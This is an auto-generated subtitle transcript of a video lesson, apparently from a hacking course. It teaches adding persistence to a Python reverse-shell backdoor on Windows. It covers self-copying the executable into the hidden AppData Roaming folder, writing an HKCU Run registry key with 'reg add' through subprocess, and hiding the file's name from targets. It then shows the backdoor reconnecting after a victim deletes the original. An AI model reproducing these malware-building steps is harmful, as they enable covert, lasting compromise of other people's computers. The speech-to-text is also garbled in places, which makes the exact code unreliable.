1 00:00:00,390 --> 00:00:02,190 Hello everybody and welcome back. 2 00:00:02,190 --> 00:00:08,370 And right now let's actually start off by coding that part of persistence of our back door. 3 00:00:08,580 --> 00:00:14,360 So first thing we want to do is import two libraries into our reverse show. 4 00:00:14,460 --> 00:00:16,890 The were the first library is actually 5 00:00:19,860 --> 00:00:20,960 the OS library. 6 00:00:20,970 --> 00:00:23,000 So we already used it before. 7 00:00:23,100 --> 00:00:29,010 As I showed you in the python basics if you want to clear your screen for example you need to import 8 00:00:29,070 --> 00:00:30,400 the OS library. 9 00:00:30,420 --> 00:00:35,680 So just go to the upper part of your reverse shall the P Y program and import os. 10 00:00:35,790 --> 00:00:38,580 The next thing you want to import is import shuttle. 11 00:00:38,720 --> 00:00:45,150 Now this is the library where we believe the function which allows us to self copy the file that we 12 00:00:45,330 --> 00:00:47,760 are running into a different directory. 13 00:00:47,760 --> 00:00:50,850 So that is also something that we want to import. 14 00:00:50,880 --> 00:00:54,600 And the third thing you want to import is the space library. 15 00:00:54,600 --> 00:00:58,380 So import says now we will need. 16 00:00:58,380 --> 00:01:02,190 This is part of this this library in order to use the shuttle. 17 00:01:02,190 --> 00:01:03,740 That copy people function in. 18 00:01:03,840 --> 00:01:08,560 And in order to copy our file into the different executable. 19 00:01:08,610 --> 00:01:09,780 Now I'll show you what I mean. 20 00:01:09,780 --> 00:01:15,890 So just for now on import these three libraries and let's scroll down to the beginning of our program. 21 00:01:16,050 --> 00:01:19,890 Now what you want where you want to call this is right at the beginning of it. 22 00:01:19,920 --> 00:01:27,660 So we want to perform this type of the self copying file and creating registry key even before we actually 23 00:01:28,620 --> 00:01:30,210 perform the connection function. 24 00:01:30,240 --> 00:01:38,330 So what we want to do is make a variable called location for now. 25 00:01:38,350 --> 00:01:46,660 So location equals what we will do right now is we will set up a location where two cells copy or two 26 00:01:46,660 --> 00:01:50,670 basically make a copy of our backdoor to which directory. 27 00:01:50,680 --> 00:01:53,560 So we will use the HP data directory. 28 00:01:53,560 --> 00:01:59,200 The reason why we are using the app data or how we want to call it directory is because it is a hidden 29 00:01:59,200 --> 00:02:02,080 directory that most of the users can't even find. 30 00:02:02,080 --> 00:02:07,030 So in order for you to go to it you just basically open your command prompt. 31 00:02:07,030 --> 00:02:11,670 Make sure you're on your on your account not be on desktop or somewhere like that. 32 00:02:11,740 --> 00:02:16,640 Back out to your account directory and then you can just see these two AP data. 33 00:02:16,900 --> 00:02:21,370 And there you have three other directories which is local Okello and roaming. 34 00:02:21,370 --> 00:02:29,580 Now we will be copying our file into the roaming directory which is also a hidden directory. 35 00:02:30,700 --> 00:02:35,650 So see these roaming and right here we will have our file. 36 00:02:36,190 --> 00:02:41,230 So this is the directory that can just show you a little bit better where we will be hoping to file. 37 00:02:41,230 --> 00:02:45,180 So this will be our location of our copied backdoor. 38 00:02:45,340 --> 00:02:48,050 So let us start coding that. 39 00:02:48,160 --> 00:02:56,260 Now the OS library allows us to actually specify this path on and on any P.C. we run this. 40 00:02:56,290 --> 00:03:02,770 So this means that for example you will not know how you how your target account is called. 41 00:03:02,770 --> 00:03:09,910 So you will not be able to actually specify the path itself into your code you will need to specify 42 00:03:10,060 --> 00:03:17,740 the function which allows us to actually change that part of the account in on an APC that we run this 43 00:03:17,740 --> 00:03:18,520 on. 44 00:03:18,520 --> 00:03:24,220 Now what I mean by that is that whoever runs this on their windows P.C. we will be able to execute this 45 00:03:24,220 --> 00:03:37,120 function since the OS not environ and then open brackets BPP data will itself bring us back the path 46 00:03:37,150 --> 00:03:39,730 to that folder to that roaming folder. 47 00:03:40,240 --> 00:03:46,160 So what all we have to do right now for the location is we want to add the name of our file. 48 00:03:46,180 --> 00:03:50,860 Now you do not need to name the file the same as the file that you will compile. 49 00:03:50,860 --> 00:03:59,250 Let me just find the the this type of slash so not the backwards slash you want to slash the forward. 50 00:03:59,340 --> 00:04:05,600 You want to use the forward slash type 2 slashes and then you will type the name of your file. 51 00:04:05,640 --> 00:04:12,330 You can name it anything you want so we can name it backdoor so we know that it is our backdoor. 52 00:04:12,330 --> 00:04:18,090 Of course if you're running this on the real target do not name it backdoor it will be too obvious and 53 00:04:18,180 --> 00:04:21,150 all you have to do is add dot EMC. 54 00:04:21,420 --> 00:04:29,490 Now this file right here once you close the the double quotes will create a location or basically will 55 00:04:29,490 --> 00:04:35,480 pass path to the location of roaming with our backdoor to the AKC. 56 00:04:35,520 --> 00:04:42,240 So after we copy in if we type they're in the same directory that we type there before we will have 57 00:04:42,240 --> 00:04:48,720 backdoor that you see in this directory right here and you will also have the backdoor the senior directory 58 00:04:48,720 --> 00:04:49,530 right here. 59 00:04:49,530 --> 00:04:51,580 Just this path right here will be different. 60 00:04:51,600 --> 00:04:56,050 This will be the name of your window stand account but everything else will be this. 61 00:04:56,490 --> 00:05:06,450 So right now that we created the location we want to actually perform the coping the coping of our file. 62 00:05:06,510 --> 00:05:09,280 So how we do that we actually do that with the shuttle. 63 00:05:09,290 --> 00:05:18,420 So shuttle not copy file and let's just make a space so you can actually separate this part of code 64 00:05:18,420 --> 00:05:18,890 from this. 65 00:05:18,900 --> 00:05:25,410 So shut up that copy follows the function that we will use and what we will use is this dot executable 66 00:05:27,240 --> 00:05:29,520 comma location. 67 00:05:30,810 --> 00:05:37,380 This function right here will perform the coping of our executable which is our reverse shell to the 68 00:05:37,380 --> 00:05:40,470 location that we specified under this name. 69 00:05:40,470 --> 00:05:47,160 So for example if our executable after we compile it is called reverse dot EMC and they run it put it 70 00:05:47,160 --> 00:05:48,490 on desktop and run it. 71 00:05:48,630 --> 00:05:56,190 It will make a copy right away of that same program to the TPP data roaming folder with the name tag 72 00:05:56,260 --> 00:06:00,960 or not the AKC and only after that it will perform the connection. 73 00:06:00,960 --> 00:06:10,560 So what we want to do right after this is basically perform the creation of the registry key for our 74 00:06:10,560 --> 00:06:16,980 file so it can actually be run every time the user starts their computer and logs into the we heard 75 00:06:16,980 --> 00:06:20,990 to the two and logs into their windows user account. 76 00:06:21,000 --> 00:06:28,950 So we will use some process library that we already imported says we can see right here that we use 77 00:06:28,950 --> 00:06:32,110 the same process library for a different type of thing. 78 00:06:32,160 --> 00:06:39,720 Right now we want to type your sub process not call and we want to call the command that will actually 79 00:06:40,710 --> 00:06:42,090 make a registry key. 80 00:06:42,090 --> 00:06:47,430 Now this is the command that you can run in the command prompt so it will specify the same command to 81 00:06:47,430 --> 00:06:50,400 the same path where we want to store our registry key. 82 00:06:50,460 --> 00:06:54,810 So we want to type your rank add now rather than typing right. 83 00:06:54,810 --> 00:06:59,550 Here is best just the syntax for adding the registry keys so just follow up with me. 84 00:06:59,640 --> 00:07:08,250 So req at age K see you now a this HK Siu basically stands for this HK current user. 85 00:07:08,490 --> 00:07:16,260 So we are specifying the path right now so we want to type forward slash and then software. 86 00:07:16,260 --> 00:07:20,100 I believe first of all it is software right. 87 00:07:20,400 --> 00:07:35,220 So each key software and then Microsoft so slash Microsoft forward slash ups micro soft and then forward 88 00:07:35,220 --> 00:07:36,780 slash once again. 89 00:07:37,010 --> 00:07:38,520 And let's see what's next. 90 00:07:38,730 --> 00:07:40,810 So after the Microsoft. 91 00:07:40,980 --> 00:07:44,040 The next thing is Windows. 92 00:07:44,040 --> 00:07:50,370 And then after the windows we want to specify the current version so slash windows and then forward 93 00:07:50,370 --> 00:07:57,670 slash current version and then I believe the next one will be run. 94 00:07:57,700 --> 00:08:03,400 So while they have to specify as one more which is the run folder right here where we will store our 95 00:08:03,400 --> 00:08:05,680 registry key so slash run. 96 00:08:07,390 --> 00:08:12,320 And right after that what we want to do is perform the backwards slash so V. 97 00:08:12,400 --> 00:08:18,640 This will be the name of our registry key we can name it backdoor as well so. 98 00:08:18,690 --> 00:08:20,860 So let's name it backdoor. 99 00:08:21,280 --> 00:08:25,840 This is a type so rag underscore easy as we can see right here. 100 00:08:26,200 --> 00:08:33,220 This is this is what we specify with the name of the registry keys so we will have a backdoor name right 101 00:08:33,220 --> 00:08:33,970 here. 102 00:08:33,970 --> 00:08:36,400 And the type would be the same as other types as well. 103 00:08:36,400 --> 00:08:39,170 So registry underscore as Z. 104 00:08:39,190 --> 00:08:45,670 And right now what we want to specify afterwards if that is the data part or basically the part where 105 00:08:45,670 --> 00:08:52,270 we specify the path to our backdoor that we s copied into the AP data roaming folder. 106 00:08:52,270 --> 00:08:54,680 So let us do that as well. 107 00:08:54,730 --> 00:09:00,730 We have to do it with DB Sledge team command and then what. 108 00:09:00,740 --> 00:09:08,360 Want to specify is actually the double quotes why we are specifying the double quotes is because right 109 00:09:08,390 --> 00:09:14,870 now we will add a string to this command if we specify just a single quote It will make already our 110 00:09:14,870 --> 00:09:20,600 string it will already close up our first apostrophe right here. 111 00:09:20,660 --> 00:09:26,150 So we do not want to do that we want to add the double quotes right now and then a single quote which 112 00:09:26,150 --> 00:09:34,010 of course this apostrophe then we want to add a plus location which is the location now of our path. 113 00:09:34,010 --> 00:09:40,800 So location and then plus single code double quoted and single port. 114 00:09:41,090 --> 00:09:51,470 What we did with this is basically right here as you can see we had to mix to use a mixture of the single 115 00:09:51,470 --> 00:09:54,410 and double quotes in order to specify the command correctly. 116 00:09:54,830 --> 00:10:03,150 So all we have to do right now is type your comma and then Shell equals true close our brackets and 117 00:10:03,150 --> 00:10:04,290 that should be it. 118 00:10:04,410 --> 00:10:08,790 Now shall they go through is the same as in this part right here so we can see we also use the same 119 00:10:08,790 --> 00:10:10,080 sports library. 120 00:10:10,350 --> 00:10:18,310 And right now if we run this on target b c it should create a registry key called backdoor we did type 121 00:10:18,320 --> 00:10:26,400 Greg underscore a C with the location to the backdoor dot the AKC file that we copied in our AP Data 122 00:10:26,400 --> 00:10:27,010 folder. 123 00:10:27,120 --> 00:10:33,980 So there is another thing that we need to do before we actually compile this and run it. 124 00:10:33,980 --> 00:10:38,780 What we want to do is actually test if this location already exists. 125 00:10:38,780 --> 00:10:45,590 So for example let's say you run this a first time on target b c and they create and then all of this 126 00:10:45,630 --> 00:10:50,420 part all part of this code happens so we copy the file to the AP data. 127 00:10:50,430 --> 00:10:51,700 Then we add the registry key. 128 00:10:52,430 --> 00:10:57,910 But let's say that restart the P.C. once again and they will perform the same function once again. 129 00:10:57,920 --> 00:11:03,050 So they will add another registry key they will perform the same path right here with copying the file. 130 00:11:03,140 --> 00:11:04,510 We do not want to do that. 131 00:11:04,520 --> 00:11:06,080 We want to only do that. 132 00:11:06,110 --> 00:11:10,520 This the first time they run the program there is really no point in doing this. 133 00:11:10,550 --> 00:11:15,780 Once again after every reboot and after every time they run the program. 134 00:11:15,800 --> 00:11:21,860 So what we want to do is after these specifying of the location since this is a variable we do not need 135 00:11:21,860 --> 00:11:23,150 to put it right here. 136 00:11:23,180 --> 00:11:26,360 We will use something called if not not. 137 00:11:26,390 --> 00:11:34,260 If not is basically same as if just right now we will specify if the path if this path right here doesn't 138 00:11:34,340 --> 00:11:35,260 exist. 139 00:11:35,270 --> 00:11:41,690 This means that the program is being run for the first time since if this path exists that means that 140 00:11:41,690 --> 00:11:47,090 the program has already been run before and the program has executed these two functions since this 141 00:11:47,090 --> 00:11:48,360 path does exist. 142 00:11:48,560 --> 00:11:56,360 But if it doesn't exists which we will check we do function always dot path not exists and then we want 143 00:11:56,360 --> 00:12:00,820 to specify what path which is the location path. 144 00:12:01,610 --> 00:12:08,420 And then we put the two dots right here and then if the path doesn't exist it means we are running it 145 00:12:08,420 --> 00:12:09,260 for the first time. 146 00:12:09,260 --> 00:12:15,770 So we want to perform the copying to the AP data folder and we want to perform the adding of our registry 147 00:12:15,770 --> 00:12:16,990 key. 148 00:12:17,000 --> 00:12:24,980 If it does exist it will just keep this code red here and it will go straight to the creation of socket 149 00:12:25,010 --> 00:12:27,150 and then performing the connection. 150 00:12:27,200 --> 00:12:31,720 So let's see how this will work if we just save this right now. 151 00:12:31,770 --> 00:12:38,880 Controller to save and control X to exit now let's perform the compilation once again could just find 152 00:12:38,880 --> 00:12:40,720 the command from the previous video. 153 00:12:40,730 --> 00:12:41,380 Here it is. 154 00:12:41,380 --> 00:12:42,880 So wine route. 155 00:12:43,610 --> 00:12:48,420 And then the path to the solar river shall not be by one file and no console. 156 00:12:48,710 --> 00:12:51,170 I click here enter so we can compile our program 157 00:12:54,770 --> 00:13:00,530 we wait for the compilation to finish and then after it finishes we will cooperate once again. 158 00:13:00,530 --> 00:13:03,320 So let's add our USP drive 159 00:13:13,270 --> 00:13:16,830 I first have to delete the previous reverse shell from this folder. 160 00:13:16,840 --> 00:13:24,100 So let me just delete this right here so I have to open a terminal and I will remove the riggers shall 161 00:13:24,100 --> 00:13:26,390 not exceed from the previous video. 162 00:13:26,490 --> 00:13:26,770 Good. 163 00:13:26,800 --> 00:13:30,210 So right now I can close this as well. 164 00:13:30,280 --> 00:13:34,820 Right now we want to go over this directory right here. 165 00:13:35,530 --> 00:13:42,130 And we want to move as usual our reverse shall that easy media route. 166 00:13:42,160 --> 00:13:45,550 And then the name of your USP drive. 167 00:13:45,550 --> 00:13:56,110 We compete there then then we can delete all of the unnecessary things such as test build and spec so 168 00:13:56,410 --> 00:14:00,830 what we want to do right now is same as before so unplug the USB drive. 169 00:14:02,520 --> 00:14:05,970 Open it on your windows machine. 170 00:14:06,050 --> 00:14:13,340 Face the reverse shell onto the desktop and then run the reverse shell now. 171 00:14:13,350 --> 00:14:17,760 Right now you can see that it is running the reverse shell so everything went good. 172 00:14:18,030 --> 00:14:26,100 Now we can start up our server and listen for the incoming connections now since we know that our reverse 173 00:14:26,100 --> 00:14:32,130 shell tries to connect every 20 seconds we should be good to go in about 20 seconds or less as we can 174 00:14:32,130 --> 00:14:36,390 see we already perform the connection and everything looks the same. 175 00:14:36,480 --> 00:14:44,580 But right now what we want to check is if the the s coping of the file worked and also if we successfully 176 00:14:44,580 --> 00:14:47,100 created the registry key for that file. 177 00:14:47,760 --> 00:14:52,590 So right now if I go to the command prompt we can see I'm still in the same directory. 178 00:14:52,650 --> 00:14:58,260 There is no back door to see right here since we did since I ran this their command before actually 179 00:14:58,260 --> 00:14:59,310 running the program. 180 00:14:59,460 --> 00:15:05,130 And if we type there once again right here right now you will see we have our new file in here called 181 00:15:05,220 --> 00:15:11,730 backdoor dot the XY which is the same size as our reverse shell since it is the same file we just copied 182 00:15:11,730 --> 00:15:18,090 it into this directory but also we want to make sure that the registry keys successfully created for 183 00:15:18,090 --> 00:15:19,110 this path right here. 184 00:15:19,110 --> 00:15:20,430 So if we go right here. 185 00:15:20,430 --> 00:15:27,150 Press F5 to refresh we can see our new registry key has been added which is called backdoor which is 186 00:15:27,990 --> 00:15:34,370 points to the path of C a user's HP Data roaming and then backdoor that the see. 187 00:15:34,410 --> 00:15:41,100 So right now we know that this works successfully now every time the user reboots their machine their 188 00:15:41,520 --> 00:15:47,550 backdoor will run at the startup or at the log in of their account and they will perform the connection 189 00:15:47,580 --> 00:15:48,840 every 20 seconds. 190 00:15:48,840 --> 00:15:54,690 So this means that we can successfully connect to their P.C. whenever we want after as many times as 191 00:15:54,690 --> 00:15:57,160 they reboot the the file. 192 00:15:57,180 --> 00:16:04,700 So right now if they for example let's quit this and if they for example even delete this reversal right 193 00:16:04,700 --> 00:16:07,930 here which for some reason once again doesn't want to delete. 194 00:16:07,940 --> 00:16:10,040 So we will have to fix that as well. 195 00:16:10,040 --> 00:16:16,760 So let's close it in our task manager day for example notice that this reverse Shell didn't open anything 196 00:16:17,060 --> 00:16:19,140 and they think this is a broken program. 197 00:16:19,250 --> 00:16:23,390 They deleted right here and then they think they're going to go. 198 00:16:23,420 --> 00:16:30,290 So but we know that we still have the backdoor that the in our roaming folder and that we also have 199 00:16:30,290 --> 00:16:33,860 the registry key for it to run at the start up. 200 00:16:33,860 --> 00:16:41,100 So now we will be able to connect even after they reboot and delete the file so that we about it for 201 00:16:41,100 --> 00:16:41,720 this video. 202 00:16:41,780 --> 00:16:45,100 I hope you enjoyed it and I hope I see you in the next one. 203 00:16:45,110 --> 00:16:45,510 Bye.